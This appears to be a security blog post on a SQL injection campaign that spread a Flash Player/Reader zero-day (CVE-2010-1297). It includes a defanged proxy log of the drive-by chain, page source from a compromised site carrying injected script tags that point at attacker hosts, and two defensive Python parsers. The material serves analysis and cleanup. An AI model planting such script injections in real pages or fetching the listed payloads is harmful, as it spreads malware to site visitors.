The crew behind the recent mass SQL injection campaign is now using the latest Adobe Flash Player / Reader vulnerability, CVE-2010-1297, in its drive-by-download attacks. Yesterday I recorded a video showing Cloud Antivirus blocking the 0day exploit with the behavioral blocking technology included in the free version. Check that out here:
We recommend patching Adobe Flash Player and Reader, and then installing Cloud Antivirus as a second layer against future 0day attacks.
Here are some logs of our most recent encounter:
Session traffic:
GET hxxp://2677.in/cnzz.html
200 OK (text/html)
GET hxxp://2677.in/ie.html
200 OK (text/html)
GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191
200 OK (text/html)
GET hxxp://2677.in/log.txt
200 OK (text/plain)
GET hxxp://2677.in/anhey.swf
200 OK (application/x-shockwave-flash)
GET hxxp://2677.in/anhey.swf
206 Partial Content (application/x-shockwave-flash)
GET hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-1276289711-http%3A//www.generationdb.com/&showp=800x600&st=1276292642&sin=http%3A//www.generationdb.com/&res=0
200 OK (image/gif)
GET hxxp://2677.in/log.exe
200 OK (application/octet-stream)
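Reading the session above in order: two landing pages on 2677.in, a cnzz.com visitor counter, log.txt, the Flash file anhey.swf (fetched twice, the second time as a 206 partial-content range request), a second counter hit, and finally log.exe served as an octet-stream. As an added example (my code, not part of the original post), here is a small parser that reconstructs that chain from the proxy log and flags the host that served a Flash or PDF object followed by an executable download. It generalizes the page's single case slightly: a PDF carrying the SWF is treated as a carrier too, since that is the Reader/Acrobat side of CVE-2010-1297. The sample log is a constructed copy of the session above with the long tracker URL shortened.

```python
import re

# Constructed sample: the proxy session from the post above, with the
# wrapped cnzz.com tracker URL shortened and the URLs left defanged (hxxp).
SESSION_LOG = """\
GET hxxp://2677.in/cnzz.html
200 OK (text/html)
GET hxxp://2677.in/ie.html
200 OK (text/html)
GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191
200 OK (text/html)
GET hxxp://2677.in/log.txt
200 OK (text/plain)
GET hxxp://2677.in/anhey.swf
200 OK (application/x-shockwave-flash)
GET hxxp://2677.in/anhey.swf
206 Partial Content (application/x-shockwave-flash)
GET hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/
200 OK (image/gif)
GET hxxp://2677.in/log.exe
200 OK (application/octet-stream)
"""

REQUEST_RE = re.compile(r"^GET\s+(?P<url>\S+)$")
RESPONSE_RE = re.compile(r"^(?P<status>\d{3})\s+[^(]*\((?P<mime>[^)]+)\)$")
HOST_RE = re.compile(r"^[a-z]+://(?P<host>[^/:?#]+)", re.I)

# Objects that can carry the CVE-2010-1297 trigger: the SWF itself, or a PDF
# with the SWF embedded for the Reader/Acrobat side of the bug.
CARRIER_MIMES = {"application/x-shockwave-flash", "application/pdf"}
# What a dropped payload usually looks like on the wire.
PAYLOAD_MIMES = {"application/octet-stream", "application/x-msdownload"}


def parse_session(text):
    """Pair every 'GET <url>' line with the response line that follows it."""
    entries, pending = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        req = REQUEST_RE.match(line)
        if req:
            pending = req.group("url")
            continue
        resp = RESPONSE_RE.match(line)
        if resp and pending is not None:
            host = HOST_RE.match(pending)
            entries.append({
                "url": pending,
                "host": host.group("host").lower() if host else "",
                "status": int(resp.group("status")),
                "mime": resp.group("mime").strip(),
            })
            pending = None
    return entries


def drive_by_chain(entries):
    """Find the first host that served an exploit carrier and later an executable.

    Returns None when no host shows the carrier-then-binary sequence, otherwise
    a dict describing the chain (landing pages, carrier, partial fetch, payload).
    """
    first_carrier = {}     # host -> index of the first carrier object it served
    partial_hosts = set()  # hosts whose carrier was (re)fetched with a 206
    for i, e in enumerate(entries):
        if e["mime"] in CARRIER_MIMES:
            first_carrier.setdefault(e["host"], i)
            if e["status"] == 206:
                partial_hosts.add(e["host"])
        elif e["mime"] in PAYLOAD_MIMES and e["host"] in first_carrier:
            c = first_carrier[e["host"]]
            return {
                "host": e["host"],
                "landing_pages": [
                    p["url"] for p in entries[:c]
                    if p["host"] == e["host"] and p["mime"] == "text/html"
                ],
                "carrier": entries[c]["url"],
                "carrier_partial_fetch": e["host"] in partial_hosts,
                "payload": e["url"],
            }
    return None


if __name__ == "__main__":
    chain = drive_by_chain(parse_session(SESSION_LOG))
    for key, value in chain.items():
        print(f"{key}: {value}")
```

The third-party counter hits on cnzz.com fall out of the chain automatically because the carrier and the payload are keyed by host; a tracker that only ever serves text/html and image/gif never enters first_carrier.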
Injection log (page source from a compromised site, showing the script tags appended to the stored field values as the page renders them):
<table width="96%" border="0" align="center" cellpadding="0"
cellspacing="0">
<tr>
<td colspan="2"><img alt="" src="images/5x5.gif" width="5" height="8"
/></td>
</tr>
<tr>
<td align="center" class="hoverbox"><a href="#"><img
src='upload/community/moresmall_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /><img src='upload/community/large_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='7'"
target="_self">We are all</a> ... <br />Category: Groups,<br />Location: USA<script src=hxxp://2677.in/yahoo.js></script></td></tr><tr><td colspan="2">-----------------------------------------</td></tr></table></td>
</tr><tr>
<td>
<table width="96%" border="0" align="center" cellpadding="0"
cellspacing="0">
<tr>
<td colspan="2"><img alt="" src="images/5x5.gif" width="5" height="8"
/></td>
</tr>
<tr>
<td align="center" class="hoverbox"><a href="#"><img
src='upload/community/moresmall_2065474113_IMG_4127.JPG<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /><img src='upload/community/large_2065474113_IMG_4127.JPG<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='6'"
target="_self">Technosoft</a> ... <br />Category:
Business,<br />Location: India<script src=hxxp://2677.in/yahoo.js></script></td></tr><tr><td colspan="2" class="line">-----------------------------------------</td></tr></table></td>
</tr>
</table>
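When triaging a dump like this it helps to know which of the injected tags actually run. The copies that landed inside the quoted img src values are swallowed into the attribute (the browser just asks for a nonsense image URL), while the copy appended to the Location text field becomes a real script element and loads yahoo.js. As an added example (my code, not from the post or from the compromised site), here is a scanner that walks the fragment with a tag-aware regex and classifies every injected script as live or inert, then lists the hosts involved. The sample input is a trimmed copy of the first record in the injection log above, with the defanged hxxp URLs kept as-is; unquoted attribute values are not handled, which is an assumption of this example.

```python
import re

# Constructed sample: the first record from the injection log above, trimmed,
# with the defanged hxxp URLs left exactly as the post shows them.
SAMPLE_ROW = """\
<td align="center" class="hoverbox"><a href="#"><img src='upload/community/moresmall_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='7'" target="_self">We are all</a> ... <br />Category: Groups,<br />Location: USA<script src=hxxp://2677.in/yahoo.js></script></td>
"""

# One start or end tag. Attribute values may be '...', "..." or bare. A quoted
# value may contain < and >, which is exactly how the injected <script> tags
# end up swallowed inside the img src attributes.
TAG_RE = re.compile(
    r'''<(?P<name>/?[A-Za-z][^\s/>]*)(?P<attrs>(?:\s+[^\s=>/]+(?:\s*=\s*(?:'[^']*'|"[^"]*"|[^\s>'"]+))?)*)\s*/?>'''
)
# src=... of a script tag that the parser saw as a real element.
SRC_RE = re.compile(r'''\bsrc\s*=\s*['"]?(?P<src>[^\s'">]+)''', re.I)
# A whole <script src=...></script> pair sitting inside another tag's attributes.
INJECTED_RE = re.compile(
    r'''<script\s+src\s*=\s*['"]?(?P<src>[^\s'">]+)['"]?\s*>\s*</script\s*>''', re.I
)
HOST_RE = re.compile(r"^[a-z]+://(?P<host>[^/:?#]+)", re.I)


def find_injected_scripts(html):
    """Return [(src, 'live'|'inert')] for every <script src=...> in the fragment.

    'live'  - the tag is a real element (appended to a text field), so it runs.
    'inert' - the tag sits inside a quoted attribute value and never executes.
    """
    findings = []
    pos = 0
    while True:
        m = TAG_RE.search(html, pos)
        if m is None:
            break
        name = m.group("name").lower()
        if name == "script":
            s = SRC_RE.search(m.group("attrs"))
            if s:
                findings.append((s.group("src"), "live"))
        elif name != "/script":
            for s in INJECTED_RE.finditer(m.group("attrs")):
                findings.append((s.group("src"), "inert"))
        pos = m.end()
    return findings


def injected_hosts(findings):
    """Sorted list of the hosts the injected script tags point at."""
    hosts = set()
    for src, _ in findings:
        h = HOST_RE.match(src)
        if h:
            hosts.add(h.group("host").lower())
    return sorted(hosts)


if __name__ == "__main__":
    found = find_injected_scripts(SAMPLE_ROW)
    for src, state in found:
        print(f"{state:5} {src}")
    print("hosts:", ", ".join(injected_hosts(found)))
```

The live/inert split matters for cleanup priority, not for whether the site is compromised: every one of these values came out of the database, so all affected columns need the tags stripped and the injection point closed, but the text-field copies are the ones serving the drive-by to visitors right now.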

Robint.us SQLi Utilizing CVE-2010-1297 Exploit